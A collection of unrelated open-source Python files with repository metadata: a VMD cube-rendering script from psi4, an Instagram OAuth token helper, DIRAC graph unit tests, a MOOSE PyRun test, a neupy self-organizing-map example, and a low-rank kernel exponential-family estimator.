parser.add_argument('--scale', metavar='<factor>', type=float, nargs='?',default=1.0,
help='the scaling factor (float, default = 1.0)')
parser.add_argument('--no-montage', action="store_true",
help='call montage to combine images. (string, default = false)')
parser.add_argument('--no-labels', action="store_true",
help='do not add labels to images. (string, default = false)')
parser.add_argument('--imagesize', metavar='<integer>', type=int, nargs='?',default=250,
help='the size of each image (integer, default = 250)')
parser.add_argument('--imagew', metavar='<integer>', type=int, nargs='?',default=250,
help='the width of images (integer, default = 250)')
parser.add_argument('--imageh', metavar='<integer>', type=int, nargs='?',default=250,
help='the height of images (integer, default = 250)')
parser.add_argument('--fontsize', metavar='<integer>', type=int, nargs='?',default=20,
help='the font size (integer, default = 20)')
parser.add_argument('--interactive', action="store_true",
help='run in interactive mode (default = false)')
parser.add_argument('--gzip', action="store_true",
help='gzip cube files (default = false)')
parser.add_argument('--national_scheme', action="store_true",
help='use a red/blue color scheme. (string, default = false)')
parser.add_argument('--silver_scheme', action="store_true",
help='use a gray/white color scheme. (string, default = false)')
parser.add_argument('--bright_scheme', action="store_true",
help='use a soft yellow/blue color scheme. (string, default = false)')
parser.add_argument('--electron_scheme', action="store_true",
help='use a purple/green color scheme. (string, default = false)')
args = parser.parse_args()
options["CUBEDIR"][0] = str(args.data)
options["SURF1ID"][0] = str(args.color1)
options["SURF2ID"][0] = str(args.color2)
options["ISOVALUE1"][0] = str(args.iso)
options["ISOVALUE2"][0] = str(-args.iso)
options["RX"][0] = str(args.rx)
options["RY"][0] = str(args.ry)
options["RZ"][0] = str(args.rz)
options["TX"][0] = str(args.tx)
options["TY"][0] = str(args.ty)
options["TZ"][0] = str(args.tz)
options["OPACITY"][0] = str(args.opacity)
options["SCALE"][0] = str(args.scale)
options["LABEL_MOS"][0] = str(not args.no_labels)
options["MONTAGE"][0] = str(not args.no_montage)
options["FONTSIZE"][0] = str(args.fontsize)
options["IMAGEW"][0] = str(args.imagew)
options["IMAGEH"][0] = str(args.imageh)
options["INTERACTIVE"][0] = str(args.interactive)
options["GZIP"][0] = str(args.gzip)
if args.national_scheme:
options["SURF1ID"][0] = '23'
options["SURF2ID"][0] = '30'
if args.silver_scheme:
options["SURF1ID"][0] = '2'
options["SURF2ID"][0] = '8'
if args.electron_scheme:
options["SURF1ID"][0] = '13'
options["SURF2ID"][0] = '12'
if args.bright_scheme:
options["SURF1ID"][0] = '32'
options["SURF2ID"][0] = '22'
print("Parameters:")
sorted_parameters = sorted(options.keys())
for k in sorted_parameters:
print(" %-20s %s" % (options[k][1],options[k][0]))
def find_cubes(options):
# Find all the cube files in a given directory
dir = options["CUBEDIR"][0]
sorted_files = []
zipped_files = []
for f in listdir(options["CUBEDIR"][0]):
if "\'" in f:
nf = f.replace("\'", "p")
os.rename(f,nf)
f = nf
if "\"" in f:
nf = f.replace("\"", "pp")
os.rename(f,nf)
f = nf
if f[-5:] == '.cube':
sorted_files.append(f)
elif f[-8:] == '.cube.gz':
found_zipped = True
# unzip file
sorted_files.append(f[:-3])
zipped_files.append(f)
if len(zipped_files) > 0:
print("\nDecompressing gzipped cube files")
FNULL = open(os.devnull, 'w')
subprocess.call(("gzip -d %s" % " ".join(zipped_files)),stdout=FNULL, shell=True)
options["GZIP"][0] = 'True'
return sorted(sorted_files)
def write_and_run_vmd_script(options,cube_files):
vmd_script = open(vmd_script_name,"w+")
vmd_script.write(vmd_template_rotate)
# Define a map that contains all the values of the VMD parameters
replacement_map = {}
for k,v in options.iteritems():
key = "PARAM_" + k.upper()
replacement_map[key] = v[0]
for n,f in enumerate(cube_files):
replacement_map["PARAM_CUBENUM"] = "%03d" % n
replacement_map["PARAM_CUBEFILE"] = options["CUBEDIR"][0] + "/" + f[:-5]
vmd_script_surface = multigsub(replacement_map,vmd_template_surface)
vmd_script_head = multigsub(replacement_map,vmd_template)
if options["INTERACTIVE"][0] == 'True':
vmd_script_render = multigsub(replacement_map,vmd_template_interactive)
else:
vmd_script_render = multigsub(replacement_map,vmd_template_render)
vmd_script.write(vmd_script_head + "\n" + vmd_script_surface + "\n" + vmd_script_render)
if options["INTERACTIVE"][0] == 'False':
vmd_script.write("quit")
vmd_script.close()
# Call VMD in text mode
FNULL = open(os.devnull, 'w')
subprocess.call(("%s -dispdev text -e %s" % (options["VMDPATH"][0],vmd_script_name)),stdout=FNULL, shell=True)
else:
vmd_script.close()
# Call VMD in graphic mode
FNULL = open(os.devnull, 'w')
subprocess.call(("%s -e %s" % (options["VMDPATH"][0],vmd_script_name)),stdout=FNULL, shell=True)
def call_montage(options,cube_files):
if options["MONTAGE"][0] == 'True':
# Optionally, combine all figures into one image using montage
montage_exe = which("montage")
if montage_exe:
alpha_mos = []
beta_mos = []
densities = []
basis_functions = []
for f in cube_files:
tga_file = f[:-5] + ".tga"
if "Psi_a" in f:
alpha_mos.append(tga_file)
if "Psi_b" in f:
beta_mos.append(tga_file)
if "D" in f:
densities.append(tga_file)
if "Phi" in f:
basis_functions.append(tga_file)
# Sort the MOs
sorted_mos = []
for set in [alpha_mos,beta_mos]:
sorted_set = []
for s in set:
s_split = s.split('_')
sorted_set.append((int(s_split[2]),"Psi_a_%s_%s" % (s_split[2],s_split[3])))
sorted_set = sorted(sorted_set)
sorted_mos.append([s[1] for s in sorted_set])
os.chdir(options["CUBEDIR"][0])
# Add labels
if options["LABEL_MOS"][0] == 'True':
for f in sorted_mos[0]:
f_split = f.split('_')
label = '%s\ \(%s\)' % (f_split[3][:-4],f_split[2])
subprocess.call(("montage -pointsize %s -label %s %s -geometry '%sx%s+0+0>' %s" %
(options["FONTSIZE"][0],label,f,options["IMAGEW"][0],options["IMAGEH"][0],f)), shell=True)
# Combine together in one image
if len(alpha_mos) > 0:
subprocess.call(("%s %s -geometry +2+2 AlphaMOs.tga" % (montage_exe," ".join(sorted_mos[0]))), shell=True)
if len(beta_mos) > 0:
subprocess.call(("%s %s -geometry +2+2 BetaMOs.tga" % (montage_exe," ".join(sorted_mos[1]))), shell=True)
if len(densities) > 0:
subprocess.call(("%s %s -geometry +2+2 Densities.tga" % (montage_exe," ".join(densities))), shell=True)
if len(basis_functions) > 0:
subprocess.call(("%s %s -geometry +2+2 BasisFunctions.tga" % (montage_exe," ".join(basis_functions))), shell=True)
def zip_files(cube_files,options):
"""Gzip cube files if requested or necessary."""
if options["GZIP"][0] == 'True':
print("\nCompressing cube files")
FNULL = open(os.devnull, 'w')
subprocess.call(("gzip %s" % " ".join(cube_files)),stdout=FNULL, shell=True)
def main(argv):
find_vmd(options)
read_options(options)
save_setup_command(argv)
cube_files = find_cubes(options)
write_and_run_vmd_script(options,cube_files)
call_montage(options,cube_files)
zip_files(cube_files,options)
if __name__ == '__main__':
main(sys.argv)
|
andysim/psi4
|
psi4/share/psi4/scripts/vmd_cube.py
|
Python
|
gpl-2.0
| 16,500
|
[
"Psi4",
"VMD"
] |
0a6c51399ebfaa4250fb8998392ac012ae1e29b54eabbaaa7acc267fa56e5f63
|
from instagram.client import InstagramAPI
import sys
if len(sys.argv) > 1 and sys.argv[1] == 'local':
try:
from test_settings import *
InstagramAPI.host = test_host
InstagramAPI.base_path = test_base_path
InstagramAPI.access_token_field = "access_token"
InstagramAPI.authorize_url = test_authorize_url
InstagramAPI.access_token_url = test_access_token_url
InstagramAPI.protocol = test_protocol
except Exception:
pass
# Fix Python 2.x.
try:
import __builtin__
input = getattr(__builtin__, 'raw_input')
except (ImportError, AttributeError):
pass
client_id = input("Client ID: ").strip()
client_secret = input("Client Secret: ").strip()
redirect_uri = input("Redirect URI: ").strip()
raw_scope = input("Requested scope (separated by spaces, blank for just basic read): ").strip()
scope = raw_scope.split(' ')
# For basic, API seems to need to be set explicitly
if not scope or scope == [""]:
scope = ["basic"]
api = InstagramAPI(client_id=client_id, client_secret=client_secret, redirect_uri=redirect_uri)
redirect_uri = api.get_authorize_login_url(scope = scope)
print ("Visit this page and authorize access in your browser: "+ redirect_uri)
code = (str(input("Paste in code in query string after redirect: ").strip()))
access_token = api.exchange_code_for_access_token(code)
print ("access token: " )
print (access_token)
|
msarfati/InstaCommander
|
sandbox/get_access_token.py
|
Python
|
apache-2.0
| 1,418
|
[
"VisIt"
] |
3c5a6a6de948da9beb96430ac445a717f200ddc4e3182ff258866679ffadc3de
|
########################################################################
# $HeadURL $
# File: GraphTests.py
# Author: Krzysztof.Ciba@NOSPAMgmail.com
# Date: 2012/09/28 09:02:23
########################################################################
""" :mod: GraphTests
=======================
.. module: GraphTests
:synopsis: tests for Graph module classes
.. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com
"""
__RCSID__ = "$Id$"
# #
# @file GraphTests.py
# @author Krzysztof.Ciba@NOSPAMgmail.com
# @date 2012/09/28 09:02:24
# @brief Definition of GraphTests class.
# # imports
import unittest
# # SUT
from DIRAC.Core.Utilities.Graph import Node, Edge, Graph, DynamicProps # , topologicalSort, topoSort
class DynamicPropTests( unittest.TestCase ):
"""
.. class:: DynamicPropTests
"""
def testDynamicProps( self ):
""" test dynamic props """
class TestClass( object ):
"""
.. class:: TestClass
dummy class
"""
__metaclass__ = DynamicProps
# # dummy instance
testObj = TestClass()
# # makeProperty in
self.assertEqual( hasattr( testObj, "makeProperty" ), True )
self.assertEqual( callable( getattr( testObj, "makeProperty" ) ), True )
# # .. and works for rw properties
testObj.makeProperty( "rwTestProp", 10 )
self.assertEqual( hasattr( testObj, "rwTestProp" ), True )
self.assertEqual( getattr( testObj, "rwTestProp" ), 10 )
testObj.rwTestProp += 1
self.assertEqual( getattr( testObj, "rwTestProp" ), 11 )
# # .. and ro as well
testObj.makeProperty( "roTestProp", "I'm read only", True )
self.assertEqual( hasattr( testObj, "roTestProp" ), True )
self.assertEqual( getattr( testObj, "roTestProp" ), "I'm read only" )
# # AttributeError for read only property setattr
try:
testObj.roTestProp = 11
except AttributeError, error:
self.assertEqual( str( error ), "can't set attribute" )
class NodeTests( unittest.TestCase ):
"""
.. class:: NodeTests
"""
def setUp( self ):
""" test setup """
self.roAttrs = { "ro1" : True, "ro2" : "I'm read only" }
self.rwAttrs = { "rw1" : 0, "rw2" : ( 1, 2, 3 ) }
self.name = "BrightStart"
self.node = Node( self.name, self.rwAttrs, self.roAttrs )
def tearDown( self ):
""" clean up """
del self.roAttrs
del self.rwAttrs
del self.name
del self.node
def testNode( self ):
""" node rwAttrs roAttrs connect """
# # node name - th eon,y one prop you can't overwrite
self.assertEqual( self.node.name, self.name )
try:
self.node.name = "can't do this"
except AttributeError, error:
self.assertEqual( str( error ), "can't set attribute" )
try:
self.node.makeProperty( "name", "impossible" )
except AttributeError, error:
self.assertEqual( str( error ), "_name or name is already defined as a member" )
# # visited attr for walking
self.assertEqual( hasattr( self.node, "visited" ), True )
self.assertEqual( self.node.visited, False )
# # ro attrs
for k, v in self.roAttrs.items():
self.assertEqual( hasattr( self.node, k ), True )
self.assertEqual( getattr( self.node, k ), v )
try:
setattr( self.node, k, "new value" )
except AttributeError, error:
self.assertEqual( str( error ), "can't set attribute" )
# # rw attrs
for k, v in self.rwAttrs.items():
self.assertEqual( hasattr( self.node, k ), True )
self.assertEqual( getattr( self.node, k ), v )
setattr( self.node, k, "new value" )
self.assertEqual( getattr( self.node, k ), "new value" )
# # connect
toNode = Node( "DeadEnd" )
edge = self.node.connect( toNode, { "foo" : "boo" }, { "ro3" : True } )
self.assertEqual( isinstance( edge, Edge ), True )
self.assertEqual( edge.name, self.name + "-DeadEnd" )
self.assertEqual( self.node, edge.fromNode )
self.assertEqual( toNode, edge.toNode )
class EdgeTests( unittest.TestCase ):
"""
.. class:: EdgeTests
"""
def setUp( self ):
""" test setup """
self.fromNode = Node( "Start" )
self.toNode = Node( "End" )
self.roAttrs = { "ro1" : True, "ro2" : "I'm read only" }
self.rwAttrs = { "rw1" : 0, "rw2" : ( 1, 2, 3 ) }
def tearDown( self ):
""" clean up """
del self.fromNode
del self.toNode
del self.roAttrs
del self.rwAttrs
def testEdge( self ):
""" c'tor connect attrs """
edge = Edge( self.fromNode, self.toNode, self.rwAttrs, self.roAttrs )
# # name
self.assertEqual( edge.name, "%s-%s" % ( self.fromNode.name, self.toNode.name ) )
try:
edge.name = "can't do this"
except AttributeError, error:
self.assertEqual( str( error ), "can't set attribute" )
try:
edge.makeProperty( "name", "impossible" )
except AttributeError, error:
self.assertEqual( str( error ), "_name or name is already defined as a member" )
# # visited attr
self.assertEqual( hasattr( edge, "visited" ), True )
self.assertEqual( edge.visited, False )
# # ro attrs
for k, v in self.roAttrs.items():
self.assertEqual( hasattr( edge, k ), True )
self.assertEqual( getattr( edge, k ), v )
try:
setattr( edge, k, "new value" )
except AttributeError, error:
self.assertEqual( str( error ), "can't set attribute" )
# # rw attrs
for k, v in self.rwAttrs.items():
self.assertEqual( hasattr( edge, k ), True )
self.assertEqual( getattr( edge, k ), v )
setattr( edge, k, "new value" )
self.assertEqual( getattr( edge, k ), "new value" )
# # start and end
self.assertEqual( edge.fromNode, self.fromNode )
self.assertEqual( edge.toNode, self.toNode )
# # in fromNode, not in toNode
self.assertEqual( edge in self.fromNode, True )
self.assertEqual( edge not in self.toNode, True )
clock = 0
########################################################################
class GraphTests( unittest.TestCase ):
"""
.. class:: GraphTests
"""
def setUp( self ):
""" setup test case """
self.nodes = [ Node( "1" ), Node( "2" ), Node( "3" ) ]
self.edges = [ self.nodes[0].connect( self.nodes[1] ),
self.nodes[0].connect( self.nodes[2] ) ]
self.aloneNode = Node( "4" )
def tearDown( self ):
""" clean up """
del self.nodes
del self.edges
del self.aloneNode
def testGraph( self ):
""" ctor nodes edges connect walk """
# # create graph
gr = Graph( "testGraph", self.nodes, self.edges )
# # nodes and edges
for node in self.nodes:
self.assertEqual( node in gr, True )
for edge in self.edges:
self.assertEqual( edge in gr, True )
self.assertEqual( sorted( self.nodes ), sorted( gr.nodes() ) )
self.assertEqual( sorted( self.edges ), sorted( gr.edges() ) )
# # getNode
for node in self.nodes:
self.assertEqual( gr.getNode( node.name ), node )
# # connect
aloneEdge = gr.connect( self.nodes[0], self.aloneNode )
self.assertEqual( self.aloneNode in gr, True )
self.assertEqual( aloneEdge in gr, True )
# # addNode
anotherNode = Node( "5" )
anotherEdge = anotherNode.connect( self.aloneNode )
gr.addNode( anotherNode )
self.assertEqual( anotherNode in gr, True )
self.assertEqual( anotherEdge in gr, True )
# # walk no nodeFcn
ret = gr.walkAll()
self.assertEqual( ret, {} )
for node in gr.nodes():
self.assertEqual( node.visited, True )
gr.reset()
for node in gr.nodes():
self.assertEqual( node.visited, False )
# # walk with nodeFcn
def nbEdges( node ):
""" dummy node fcn """
return len( node.edges() )
ret = gr.walkAll( nodeFcn = nbEdges )
self.assertEqual( ret, { '1': 3, '2' : 0, '3': 0, '4' : 0, '5': 1 } )
def testDFS( self ):
""" dfs """
global clock
def topoA( graph ):
""" topological sort """
global clock
nodes = graph.nodes()
for node in nodes:
node.makeProperty( "clockA", 0 )
def postVisit( node ):
global clock
node.clockA = clock
clock += 1
graph.dfs( postVisit = postVisit )
nodes = graph.nodes()
nodes.sort( key = lambda node: node.clockA )
return nodes
def topoB( graph ):
""" topological sort """
global clock
nodes = graph.nodes()
for node in nodes:
node.makeProperty( "clockB", 0 )
def postVisit( node ):
global clock
node.clockB = clock
clock += 1
graph.dfsIter( postVisit = postVisit )
nodes = graph.nodes()
nodes.sort( key = lambda node: node.clockB )
return nodes
clock = 0
gr = Graph( "testGraph", self.nodes, self.edges )
gr.addNode( self.aloneNode )
nodesSorted = topoA( gr )
nodes = gr.nodes()
nodes.sort( key = lambda node: node.clockA, reverse = True )
self.assertEqual( nodes, nodesSorted, "topoA sort failed" )
clock = 0
gr = Graph( "testGraph", self.nodes, self.edges )
gr.addNode( self.aloneNode )
gr.reset()
nodesSorted = topoB( gr )
nodes = gr.nodes()
nodes.sort( key = lambda node: node.clockB, reverse = True )
self.assertEqual( nodes, nodesSorted, "topoB sort failed" )
def testBFS( self ):
""" bfs walk """
global clock
def walk( graph ):
""" bfs walk """
global clock
nodes = graph.nodes()
for node in nodes:
node.makeProperty( "clockC", 0 )
def postVisit( node ):
global clock
node.clockC = clock
clock += 1
nodes = graph.bfs( postVisit = postVisit )
nodes.sort( key = lambda node: node.clockC )
return nodes
clock = 0
gr = Graph( "testGraph", self.nodes, self.edges )
gr.addNode( self.aloneNode )
gr.reset()
nodesSorted = walk( gr )
nodes = gr.nodes()
nodes.sort( key = lambda node: node.clockC )
self.assertEqual( nodesSorted, nodes, "bfs failed" )
# # test execution
if __name__ == "__main__":
testLoader = unittest.TestLoader()
tests = ( testLoader.loadTestsFromTestCase( testCase ) for testCase in ( DynamicPropTests,
NodeTests,
EdgeTests,
GraphTests ) )
testSuite = unittest.TestSuite( tests )
unittest.TextTestRunner( verbosity = 3 ).run( testSuite )
|
Sbalbp/DIRAC
|
Core/Utilities/test/GraphTests.py
|
Python
|
gpl-3.0
| 10,548
|
[
"DIRAC"
] |
78dd6d0532b7dfe5e2710bf6d4412ecf5ce189667450e7e81823a868310c845b
|
# pyrun.py ---
# Author: Subhasis Ray
# Maintainer: Dilawar Singh
# See https://github.com/BhallaLab/moose-examples/blob/b2e77237ef36e47d0080cc8c4fb6bb94313d2b5e/snippets/pyrun.py
# for details.
import os
import moose
import pytest
import sys
import io
import difflib
stdout_ = sys.stdout
if sys.version_info.major > 2:
stream_ = io.StringIO()
else:
stream_ = io.BytesIO()
sys.stdout = stream_
# Removed first 3 lines since they change during each run.
expected = """Running Hello
Hello count = 0
Init World
Running World
World count = 0
Running Hello
Hello count = 1
Running World
World count = 1
Running Hello
Hello count = 2
Running World
World count = 2
Running Hello
Hello count = 3
Running World
World count = 3
Running Hello
Hello count = 4
Running World
World count = 4
Running Hello
Hello count = 5
Running World
World count = 5
Running Hello
Hello count = 6
Running World
World count = 6
Running Hello
Hello count = 7
Running World
World count = 7
Running Hello
Hello count = 8
Running World
World count = 8
Running Hello
Hello count = 9
Running World
World count = 9
Running Hello
Hello count = 10
Running World
World count = 10
Running Hello
Hello count = 11
Running World
World count = 11
Running Hello
Hello count = 12
Running World
World count = 12
Running Hello
Hello count = 13
Running World
World count = 13
Running Hello
Hello count = 14
Running World
World count = 14
Running Hello
Hello count = 15
Running World
World count = 15
Running Hello
Hello count = 16
Running World
World count = 16
Running Hello
Hello count = 17
Running World
World count = 17
Running Hello
Hello count = 18
Running World
World count = 18
Running Hello
Hello count = 19
Running World
World count = 19
Running Hello
Hello count = 20
Running World
World count = 20
Init World
Running World
World count = 0
input = 0.0
output = 0.0
Running World
World count = 1
input = 0.0
output = 0.0
Running World
World count = 2
input = 0.0
output = 0.0
Running World
World count = 3
input = 0.0
output = 0.0
Running World
World count = 4
input = 1.0
output = 1.0
Running World
World count = 5
input = 1.0
output = 1.0
Running World
World count = 6
input = 1.0
output = 1.0
Running World
World count = 7
input = 1.0
output = 1.0
Running World
World count = 8
input = 2.0
output = 4.0
Running World
World count = 9
input = 2.0
output = 4.0
Running World
World count = 10
input = 2.0
output = 4.0
Running World
World count = 11
input = 2.0
output = 4.0
Running World
World count = 12
input = 3.0
output = 9.0
Running World
World count = 13
input = 3.0
output = 9.0
Running World
World count = 14
input = 3.0
output = 9.0
Running World
World count = 15
input = 3.0
output = 9.0
Running World
World count = 16
input = 0.0
output = 0.0
Running World
World count = 17
input = 0.0
output = 0.0
Running World
World count = 18
input = 0.0
output = 0.0
Running World
World count = 19
input = 0.0
output = 0.0
Running World
World count = 20
input = 1.0
output = 1.0
Running World
World count = 21
input = 1.0
output = 1.0
Running World
World count = 22
input = 1.0
output = 1.0
Running World
World count = 23
input = 1.0
output = 1.0
Running World
World count = 24
input = 2.0
output = 4.0
Running World
World count = 25
input = 2.0
output = 4.0
Running World
World count = 26
input = 2.0
output = 4.0
Running World
World count = 27
input = 2.0
output = 4.0
Running World
World count = 28
input = 3.0
output = 9.0
Running World
World count = 29
input = 3.0
output = 9.0
Running World
World count = 30
input = 3.0
output = 9.0
Running World
World count = 31
input = 3.0
output = 9.0
Running World
World count = 32
input = 0.0
output = 0.0
Running World
World count = 33
input = 0.0
output = 0.0
Running World
World count = 34
input = 0.0
output = 0.0
Running World
World count = 35
input = 0.0
output = 0.0
Running World
World count = 36
input = 1.0
output = 1.0
Running World
World count = 37
input = 1.0
output = 1.0
Running World
World count = 38
input = 1.0
output = 1.0
Running World
World count = 39
input = 2.0
output = 4.0
Running World
World count = 40
"""
def run_sequence():
model = moose.Neutral('/model')
hello_runner = moose.PyRun('/model/Hello')
hello_runner.initString = """
print( 'Init', moose.element('/model/Hello') )
hello_count = 0
"""
hello_runner.runString = """
print( 'Running Hello' )
print( 'Hello count =', hello_count )
hello_count += 1
"""
hello_runner.run('from datetime import datetime')
hello_runner.run('print("Hello: current time:", datetime.now().isoformat())')
moose.useClock(0, hello_runner.path, 'process')
world_runner = moose.PyRun('World')
world_runner.initString = """
print( 'Init World' )
world_count = 0
def incr_count():
global world_count
world_count += 1
"""
world_runner.runString = """
print( 'Running World' )
print( 'World count =', world_count )
incr_count()
"""
world_runner.run('from datetime import datetime')
world_runner.run('print( "World: current time:", datetime.now().isoformat())')
moose.useClock(0, world_runner.path, 'process')
moose.reinit()
moose.start(0.001)
def input_output():
model = moose.Neutral('/model')
input_pulse = moose.PulseGen('/model/pulse')
#: set the baseline output 0
input_pulse.baseLevel = 0.0
#: We make it generate three pulses
input_pulse.count = 3
input_pulse.level[0] = 1.0
input_pulse.level[1] = 2.0
input_pulse.level[2] = 3.0
#: Each pulse will appear 1 s after the previous one
input_pulse.delay[0] = 1.0
input_pulse.delay[1] = 1.0
input_pulse.delay[2] = 1.0
#: Each pulse is 1 s wide
input_pulse.width[0] = 1.0
input_pulse.width[1] = 1.0
input_pulse.width[2] = 1.0
#: Now create the PyRun object
pyrun = moose.PyRun('/model/pyrun')
pyrun.runString = """
output = input_ * input_
print( 'input =', input_ )
print( 'output =', output )
"""
pyrun.mode = 2 # do not run process method
moose.connect(input_pulse, 'output', pyrun, 'trigger')
output_table = moose.Table('/model/output')
moose.connect(pyrun, 'output', output_table, 'input')
input_table = moose.Table('/model/input')
moose.connect(input_pulse, 'output', input_table, 'input')
moose.setClock(0, 0.25)
moose.setClock(1, 0.25)
moose.setClock(2, 0.25)
moose.useClock(0, input_pulse.path, 'process')
#: this is unnecessary because the mode=2 ensures that `process`
#: does nothing
moose.useClock(1, pyrun.path, 'process')
moose.useClock(2, '/model/#[ISA=Table]', 'process')
moose.reinit()
moose.start(10.0)
# This test will not pass with doctest and coverage
@pytest.mark.xfail(reason="Would not pass with python-coverage")
def test_pyrun():
global stream_, stdout_, expected
run_sequence()
moose.delete('/model')
input_output()
sys.stdout = stdout_
stream_.flush()
sys.stdout.flush()
expected = expected.split('\n')[-30:]
got = stream_.getvalue().split('\n')[-30:]
if os.environ.get('TRAVIS_OS_NAME', '') != 'osx':
for x, y in zip(expected, got):
print("{0:40s} {1:}".format(x, y))
# Deleted first 3 lines.
try:
assert expected == got
except Exception:
s = difflib.SequenceMatcher(None, '\n'.join(expected), '\n'.join(got))
assert s.ratio() >= 0.70, ("Difference is too large", s.ratio())
print('All done')
else:
print("Allow failure on Travis/OSX but not locally.")
if __name__ == '__main__':
test_pyrun()
|
dilawar/moose-core
|
tests/core/test_pyrun.py
|
Python
|
gpl-3.0
| 7,507
|
[
"MOOSE"
] |
214acdc4979deb7c47536496c989c3dc2aad377ea97ff45f37ad18d7f1cb24b3
|
import matplotlib.pyplot as plt
from sklearn import datasets
from neupy import algorithms, utils
from utils import plot_2d_grid
plt.style.use('ggplot')
utils.reproducible()
if __name__ == '__main__':
GRID_WIDTH = 20
GRID_HEIGHT = 1
data, targets = datasets.make_moons(n_samples=400, noise=0.1)
data = data[targets == 1]
sofm = algorithms.SOFM(
n_inputs=2,
features_grid=(GRID_HEIGHT, GRID_WIDTH),
verbose=True,
shuffle_data=True,
# The winning neuron will be selected based on the
# Euclidean distance. For this task it's important
# that distance is Euclidean. Other distances will
# not give us the same results.
distance='euclid',
learning_radius=2,
# Reduce learning radius by 1 after every 20 epochs.
# Learning radius will be equal to 2 during first
# 20 epochs and on the 21st epoch it will be equal to 1.
reduce_radius_after=20,
# 2 Means that neighbour neurons will have high learning
# rates during the first iterations
std=2,
# Defines a rate at which parameter `std` will be reduced.
# Reduction is monotonic and reduces after each epoch.
# In 50 epochs std = 2 / 2 = 1 and after 100 epochs
# std = 2 / 3 and so on.
reduce_std_after=50,
# Step (or learning rate)
step=0.3,
# Defines a rate at which parameter `step` will reduced.
# Reduction is monotonic and reduces after each epoch.
# In 50 epochs step = 0.3 / 2 = 0.15 and after 100 epochs
# std = 0.3 / 3 = 0.1 and so on.
reduce_step_after=50,
)
sofm.train(data, epochs=20)
red, blue = ('#E24A33', '#348ABD')
plt.scatter(*data.T, color=blue)
plt.scatter(*sofm.weight, color=red)
weights = sofm.weight.reshape((2, GRID_HEIGHT, GRID_WIDTH))
plot_2d_grid(weights, color=red)
plt.show()
|
itdxer/neupy
|
examples/competitive/sofm_moon_topology.py
|
Python
|
mit
| 1,949
|
[
"NEURON"
] |
bf8a121125c8cac7568c1c90be2684d2671e2caeeb192c9063573b906bf1b3ab
|
from abc import abstractmethod
from scipy.sparse.linalg.interface import LinearOperator
from scipy.sparse.linalg.isolve.iterative import bicgstab
from kernel_exp_family.estimators.lite.gaussian import KernelExpLiteGaussian
try:
from kernel_exp_family.estimators.parameter_search_bo import BayesOptSearch
except ImportError:
print "Bayesian Optimization for hyper-parameters unavailable -- pybo required"
from kernel_exp_family.kernels.incomplete_cholesky import incomplete_cholesky_gaussian, \
incomplete_cholesky_new_points_gaussian
from kernel_exp_family.tools.assertions import assert_array_shape
from kernel_exp_family.tools.log import Log
import numpy as np
logger = Log.get_logger()
def compute_b(X, Y, L_X, L_Y, sigma):
assert X.shape[1] == Y.shape[1]
assert L_X.shape[0] == X.shape[0]
assert L_Y.shape[0] == Y.shape[0]
NX = len(X)
D = X.shape[1]
b = np.zeros(NX)
LX1 = L_X.dot(np.sum(L_Y.T, 1))
for l in np.arange(D):
x_l = X[:, l]
y_l = Y[:, l]
s_l = x_l ** 2
t_l = y_l ** 2
# Replaces dot product with np.diag via broadcasting
# See http://mail.scipy.org/pipermail/numpy-discussion/2007-March/026809.html
D_s_LX = s_l[:, np.newaxis] * L_X
D_x_LX = x_l[:, np.newaxis] * L_X
# compute b incrementally exploiting the Cholesky factorisation of K
b += 2. / sigma * (L_X.dot(L_Y.T.dot(t_l)) \
+ D_s_LX.dot(np.sum(L_Y.T, 1)) \
- 2 * D_x_LX.dot(L_Y.T.dot(y_l))) - LX1
return b
def apply_left_C(v, X, Y, L_X, L_Y, lmbda):
assert len(v.shape) == 1
assert len(X) == len(L_X)
assert len(Y) == len(L_Y)
assert L_X.shape[1] == L_Y.shape[1]
assert X.shape[1] == Y.shape[1]
N_X = X.shape[0]
D = X.shape[1]
# multiply C to v (C is a sum over d=1...D)
result = np.zeros(N_X)
for l in range(D):
x_l = X[:, l]
y_l = Y[:, l]
# Replaces dot product with np.diag via broadcasting
# See http://mail.scipy.org/pipermail/numpy-discussion/2007-March/026809.html
# D_x_KXY = x_l[:, np.newaxis] * K
# KXY_D_y = K * y_l
# KXY_T_D_x = K.T * x_l
# D_y_KXY_T = y_l[:, np.newaxis] * K.T
# C += (D_x_KXY - KXY_D_y).dot(KXY_T_D_x - D_y_KXY_T)
D_x_LX = x_l[:, np.newaxis] * L_X
LY_T_D_y = L_Y.T * y_l
LX_T_D_x = L_X.T * x_l
D_y_LY = y_l[:, np.newaxis] * L_Y
# right term of product
x = L_X.T.dot(v)
x = D_y_LY.dot(x)
y = LX_T_D_x.dot(v)
y = L_Y.dot(y)
# right term times v
temp = x - y
# term of product
x = LY_T_D_y.dot(temp)
x = L_X.dot(x)
y = L_Y.T.dot(temp)
y = D_x_LX.dot(y)
# add both terms times v to result
result += x - y
if lmbda > 0:
# regularise with K=L_X.dot(L_X.T)
result += lmbda * L_X.dot(L_X.T.dot(v))
# regularise with I
result += lmbda * v
return result
def fit(X, Y, sigma, lmbda, L_X, L_Y,
cg_tol=1e-3,
cg_maxiter=None,
alpha0=None):
if cg_maxiter is None:
# CG needs at max dimension many iterations
cg_maxiter = L_X.shape[0]
NX = X.shape[0]
# set up and solve regularised linear system via bicgstab
# this never stores an NxN matrix
b = compute_b(X, Y, L_X, L_Y, sigma)
matvec = lambda v:apply_left_C(v, X, Y, L_X, L_Y, lmbda)
C_operator = LinearOperator((NX, NX), matvec=matvec, dtype=np.float64)
# for printing number of CG iterations
global counter
counter = 0
def callback(x):
global counter
counter += 1
# start optimisation from alpha0, if present
if alpha0 is not None:
logger.debug("Starting bicgstab from previous alpha0")
solution, info = bicgstab(C_operator, b, tol=cg_tol, maxiter=cg_maxiter, callback=callback, x0=alpha0)
logger.debug("Ran bicgstab for %d iterations." % counter)
if info > 0:
logger.warning("Warning: CG not convergence in %.3f tolerance within %d iterations" % \
(cg_tol, cg_maxiter))
a = -sigma / 2. * solution
return a
def objective(X, Y, sigma, lmbda, alpha, L_X, L_Y, b=None):
if b is None:
b = compute_b(X, Y, L_X, L_Y, sigma)
N_X = len(X)
first = 2. / (N_X * sigma) * alpha.dot(b)
second = 2. / (N_X * sigma ** 2) * alpha.dot(apply_left_C(alpha, X, Y, L_X, L_Y, lmbda))
J = first + second
return J
class KernelExpLiteGaussianLowRank(KernelExpLiteGaussian):
def __init__(self, sigma, lmbda, D, N, eta=0.1, cg_tol=1e-3, cg_maxiter=None):
KernelExpLiteGaussian.__init__(self, sigma, lmbda, D, N)
self.eta = eta
self.cg_tol = cg_tol
self.cg_maxiter = cg_maxiter
@abstractmethod
def fit_wrapper_(self):
